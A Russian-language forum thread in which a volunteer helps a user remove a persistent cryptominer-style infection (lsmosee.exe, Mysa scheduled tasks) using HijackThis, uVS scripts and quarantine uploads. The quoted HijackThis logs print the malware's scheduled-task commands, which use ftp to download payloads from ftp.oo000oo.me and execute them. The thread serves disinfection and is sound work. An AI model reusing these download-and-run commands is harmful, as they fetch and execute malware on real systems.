Перейти к содержанию
Правила раздела

Как избавиться от lsmosee.exe , mysa1,2,3 и ok.

Михайло Ломоносов

Автор Михайло Ломоносов,
в Помощь в удалении вирусов

 Share Подписчики 2

Рекомендуемые сообщения

Михайло Ломоносов

Михайло Ломоносов 0

Опубликовано
Опубликовано

Здравствуйте , столкнулся с таким вирусом , который создаёт файлы lsmosee.exe(C:\Windows\Help\lsmosee.exe)
Mysa 1(C:\Windows\System32\Tasks\Mysa1)
Mysa 2(C:\Windows\System32\Tasks\Mysa2)
Mysa 3(C:\Windows\System32\Tasks\Mysa3)
ok(C:\Windows\System32\Tasks\ok)
А так же был файл item.dat в папке debug(C:\Windows\debug\item.dat) , но его теперь нету.
Пробовал удалить - ничего не получаются восстанавливаются.
Раньше были ещё файлы lsmos.exe и lsmose.exe(Как-то избавился от них)
Прошу помочь.

Сообщение от модератора Soft
Текст отформатирован.
Ссылка на сообщение
Поделиться на другие сайты
regist

regist 617

Опубликовано
Опубликовано (изменено)

1) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.
 
2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.70.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.71.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.220.220
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.222.222
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.2
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.20.247.20
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.26.56.26
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.4.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.8.8
O17 - HKLM\System\CSS\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.4.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.8.8
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.70.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.71.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.220.220
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.222.222
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.2
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.20.247.20
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.26.56.26
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.4.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.8.8
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.4.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.8.8
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.70.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.71.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.220.220
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.222.222
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.2
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.20.247.20
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.26.56.26
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.4.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.8.8
O21 - ShellIconOverlayIdentifiers:     YndCase0Sync - {63D48440-63AB-44D0-B323-4731DFCDE9E9} - (no file)
O21 - ShellIconOverlayIdentifiers:     YndCase1Modified - {7E7DC279-E6BE-4D57-9DEC-14FA0339DBC0} - (no file)
O21 - ShellIconOverlayIdentifiers:     YndCase2Error - {FB2FE984-05F5-4512-9D9B-69D3DE61F6D9} - (no file)
O21 - ShellIconOverlayIdentifiers:     YndCase3Shared - {AF8D197E-7022-4c3d-BD88-68AD35C9C169} - (no file)
O22 - Task (Ready): Red Giant Link - C:\Program Files\Red Giant Link\Common\Red Giant Link.exe --silent (file missing)
O22 - Task (Ready): SMW_UpdateTask_Time_333132323739303030352d3437415a556c2a3223346c41 - C:\Program Files\Common Files\Noobzo\GNUpdate\wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 (file missing)

 
Если после фикса вдруг пропадёт интернет, то пропишите настройки DNS рекомендованные провайдером.
 
3)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

4) Повторите логи по правилам.

Изменено пользователем regist
  • Согласен 1
Ссылка на сообщение
Поделиться на другие сайты
Михайло Ломоносов

Михайло Ломоносов 0

Опубликовано
  • Автор
Опубликовано

Всё сделал.
Заметил , что опять появился файл lsmos.exe (загрузился в процессы и жутко висло , я завершил этот процесс) C:\Windows\System32\lsmos.exe
Не знаю какую ссылку нужно было вставить , но поставлю обе.
1. https://virusinfo.info/virusdetector/report.php?md5=317AA06C14EE025837AB59B348C42535
2. https://virusinfo.info/showthread.php?t=214639
 

Check_Browsers_LNK.log

CollectionLog-2017.08.14-23.16.zip

Ссылка на сообщение
Поделиться на другие сайты
regist

regist 617

Опубликовано
Опубликовано (изменено)

"Пофиксите" в HijackThis:

O4 - HKCU\..\Run: [GameCenterMailRu] C:\Users\Иван\AppData\Local\Mail.Ru\GameCenter\GameCenter@Mail.Ru.exe -autostart (file missing)
O4 - MSConfig\startupreg: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe /boot (file missing) (HKLM) (2017/08/14)
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task (Running): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Running): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
  • Скачайте Universal Virus Sniffer (uVS)
  • Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  • Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  • Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

  • Подробнее читайте в руководстве Как подготовить лог UVS.
Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты
Михайло Ломоносов

Михайло Ломоносов 0

Опубликовано
  • Автор
Опубликовано

В HiJackThis.exe нету следующих строк.
(В папке C:\Windows\System32\Tasks их тоже нету) 

O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task (Running): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Running): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Universal Virus Sniffer готово.

ИВАН-ПК_2017-08-15_01-24-59.7z

Ссылка на сообщение
Поделиться на другие сайты
regist

regist 617

Опубликовано
Опубликовано (изменено)

В HiJackThis.exe нету следующих строк.

Надо в новой версии фиксить из папки в HijackThis из папки ..\AutoLogger\HiJackThis, а в не допотопной.

  • Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  • Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  • Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

    ;uVS v4.0.9 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
deltmp
;---------command-block---------
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\USERS\ИВАН\APPDATA\LOCAL\MAIL.RU\GAMECENTER\NPDETECTOR.DLL
delref D:\NVSETUP.EXE
delref %SystemDrive%\USERS\ИВАН\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\NEHAPOFAKGHLJOPFEGJOGPGPELJKHJJN\8.22.5_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\EXTENSIONS\{972CE4C6-7E08-4474-A285-3208198CE6FD}.XPI
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\AUSHELPER@MOZILLA.ORG.XPI
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\E10SROLLOUT@MOZILLA.ORG.XPI
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\FIREFOX@GETPOCKET.COM.XPI
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\WEBCOMPAT@MOZILLA.ORG.XPI
apply

restart
  • В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  • Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер будет перезагружен.
  • Подробнее читайте в этом руководстве.
Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты
Михайло Ломоносов

Михайло Ломоносов 0

Опубликовано
  • Автор
Опубликовано (изменено)

На счёт HiJackThis , я скачал новую версию и ничего нового там не увидел , те же самые записи.
Скрипт выполнил , файл прикреплён.скриншот:

9dabf3ad4907.jpg

 

2017-08-15_02-19-13_log.txt

Изменено пользователем Soft
спрятал скрин под спойлер
Ссылка на сообщение
Поделиться на другие сайты
regist

regist 617

Опубликовано
Опубликовано

 

 


На счёт HiJackThis , я скачал новую версию
надо не качать, а использовать из указанной папки в Автлогере. Это самая свежая не тестовая версия.

 

 

Что с проблемой?

 

Сделайте свежий образ автозапуска.

  • Спасибо (+1) 1
  • Согласен 1
Ссылка на сообщение
Поделиться на другие сайты
Михайло Ломоносов

Михайло Ломоносов 0

Опубликовано
  • Автор
Опубликовано

На данный момент нету таких файлов , как Mysa1 , Mysa2 , Mysa3 и ok в папке C:\Windows\System32\Tasks.
Но остались 2 файла "exe" , lsmos.exe(C:\Windows\System32\lsmos.exe) и lsmosee.exe(C:\Windows\Help\lsmosee.exe).

ИВАН-ПК_2017-08-15_02-50-10.7z

Ссылка на сообщение
Поделиться на другие сайты
regist

regist 617

Опубликовано
Опубликовано (изменено)

Но остались 2 файла "exe" , lsmos.exe(C:\Windows\System32\lsmos.exe) и lsmosee.exe(C:\Windows\Help\lsmosee.exe).

Вы проверяете их наличие? Их процессы снова запускаются? Если да, то не убивайте их. А то как следствие в логе его не вижу и удалить не могу.

 

Попробуем, может так в лог добавятся

 

 

  • Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО
  • .Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  • Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

    ;uVS v4.0.5 [http://dsrt.dyndns.org]
v400c

adddir  %SystemRoot%\
crimg
  • В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  • Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы.
  • После этого в папке с программой будет создан образ автозапуска название, которого имеет формат "имя_компьютера_дата_сканирования". Прикрепите этот образ к следующему сообщению

  • !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты
Михайло Ломоносов

Михайло Ломоносов 0

Опубликовано
  • Автор
Опубликовано

lsmos.exe и lsmosee.exe в процессах не появляются , но эти файлы остались в папках.
На virustotal загружал эти файлы и результат не радует.
Вот скрипт и лог uVS.
 

ИВАН-ПК_2017-08-15_19-30-30.7z

2017-08-15_20-12-53_log.txt

Ссылка на сообщение
Поделиться на другие сайты
regist

regist 617

Опубликовано
Опубликовано
  1. [*]Закройте все программы,
временно выгрузите антивирус, файрволл и прочее защитное ПО. [*]Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". [*]Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
;uVS v4.0.9 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
;---------command-block---------
bl 03339D6F7BF0117E64ACCC09E3C5F038 264136
zoo %SystemRoot%\HELP\LSMOSEE.EXE
delall %SystemRoot%\HELP\LSMOSEE.EXE
bl FE04395C95CDD102AEABBF6B915C1A5E 4165576
zoo %Sys32%\LSMOS.EXE
delall %Sys32%\LSMOS.EXE
delref E:\STARTME.EXE
apply

czoo
restart
[*]В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..." [*]Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен. [*]После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)

Если архив отсутствует, то
с паролем
virus
.

[*]Полученный архив отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

и для надежности сделайте ещё

 

Скачайте Malwarebytes' Anti-Malware. Установите.
На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию".
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве.


 

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
 Share
Подписчики 2
Перейти к списку тем

  • Похожий контент

    • sagee
      coinminer,xmrigminer, wacatan, uwasson.A!ml
      От sagee
      В общем, сначала windows defender нашел coinminer,xmrigminer, потом wacatac, щас только uwasson, все остальные якобы удалены. Но после их удаления, я не могу запустить проверку через  
      Kaspersky Virus Removal Tool; Dr.Web CureIt!. и даже Autologger.exe не запускается, зависает проводник и ничего не происходит, диспетчер задач не открывается, просто ничего не происходит. Вот скрин того, что пишет через минуты 3 когда проводник отвисает после попытки открыть любой сканер.
    • Eoorreg
      вирус
      От Eoorreg
      Добрый вечер прошу помощи в лечении..
      CollectionLog-2019.10.17-22.27.zip
    • Роман Паятелев
      Автозапуск вируса
      От Роман Паятелев
      Добрый день. Ситуация следующая. Однажды появился данный вирус(conhost он же ТОДО с китайскими иероглифами). Появляется он стабильно после включения или перезагрузки компьютера. Его можно убить из диспетчера задач, но он появится в след. раз снова. Боролся по-всякому. Удалял браузеры.
      CollectionLog-2019.09.04-20.17.zip
    • sambase
      Mysa
      От sambase
      У меня server 2008 R2 и все было хорошо. Купили новый комп, рабочая станция для сотрудника, настроили, заводим в домен, как обычно и возникает ошибка: "При присоединении к домену "название" произошла следующая ошибка: Не найден сетевой путь." 
        На этом сервере есть роли:  + DHCP-сервер - работает, адреса выдает  + DNS-сервер  + Доменные службы Active Directory  + Файловые службы    Когда пытаюсь зайти по сети на сервер \\SERVER выдает ошибку  Не найден сетевой путь.  Код ошибки: 0x80070035    В планировщике заданий была какая-то Mysa, Mysa2, Mysa3 - удалил её и CureIt всё проверил, потом  Kaspersky Virus Removal Tool 2015 проверил, потом логи сделал. Не могу завести комп в домен, помогите спасти сервер.  
      CollectionLog-2018.11.28-17.58.zip
    • YSOFF
      Удалить троян lsmose.exe и все его части?
      От YSOFF
      Здравствуйте. Прошу помощи с удалением троянов: HEUR:Trojan.Win32.Generic (фальшивый conhost.exe), Trojan.Win32.Ukpa.a (lsmose.exe, xmrstak_cuda_backend.dll) и HEUR:RiskTool.Win32.BitMiner.gen (xmrstak_opencl_backend.dll)
      Пытался переустановить KIS18, установка прерывается ошибкой и сообщение о возможности заражения вирусами.
      Проверил систему с помощью KVRT - утилита успешно находит трояны, удаляет, но после перезапуска они появляются вновь. Не появились только три записи Mysa в планировщике. Пробовал удалять все найденные файлы из под linux - безрезультатно, появляются снова. По советам в статье https://forum.kasperskyclub.ru/index.php?showtopic=56569&page=3пробовал исполнять скрипты для AVZ:
      begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); TerminateProcessByName('C:\Windows\debug\lsmose.exe'); QuarantineFile('C:\Windows\debug\lsmose.exe',''); QuarantineFile('C:\Windows\debug\xmrstak_cuda_backend.dll',''); QuarantineFile('C:\Windows\debug\xmrstak_opencl_backend.dll',''); QuarantineFile('C:\Windows\Temp\conhost.exe',''); DeleteFile('C:\Windows\debug\lsmose.exe','32'); DeleteFile('C:\Windows\debug\xmrstak_cuda_backend.dll','32'); DeleteFile('C:\Windows\debug\xmrstak_opencl_backend.dll','32'); DeleteFile('C:\Windows\Temp\conhost.exe','32'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); RebootWindows(true); end. Архив quarantine - 
      и UVS:
      ;uVS v4.0.5 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG ;---------command-block--------- zoo %SystemRoot%\debug\xmrstak_opencl_backend.dll delref PS&AMP;C:\Windows\xmrstak_opencl_backend.dll delall %SystemRoot%\debug\xmrstak_opencl_backend.dll zoo %SystemRoot%\debug\xmrstak_cuda_backend.dll delref PS&AMP;C:\Windows\xmrstak_cuda_backend.dll delall %SystemRoot%\debug\xmrstak_cuda_backend.dll zoo %SystemRoot%\debug\lsmose.exe delref PS&AMP;C:\Windows\debug\lsmose.exe delall %SystemRoot%\debug\lsmose.exe zoo %SystemRoot%\Temp\conhost.exe delref PS&AMP;C:\Windows\Temp\conhost.exe delall %SystemRoot%\Temp\conhost.exe apply regt 28 regt 29 czoo restart Архив ZOO - 
       
      - после перезагрузки трояны в директориях C:\Windows\debug\ и в C:\Windows\Temp\ на месте.
      Сделал "полный образ автозапуска" в UVS - http://yadi.sk/d/hsUyrVZ03ahynB
       

      Сообщение от модератора Mark D. Pearlstone Не выполняйте рекомендации., которые написаны для других пользователей этого раздела.
      Не выкладывайте карантин и ссылки на него.
×
×
  • Создать...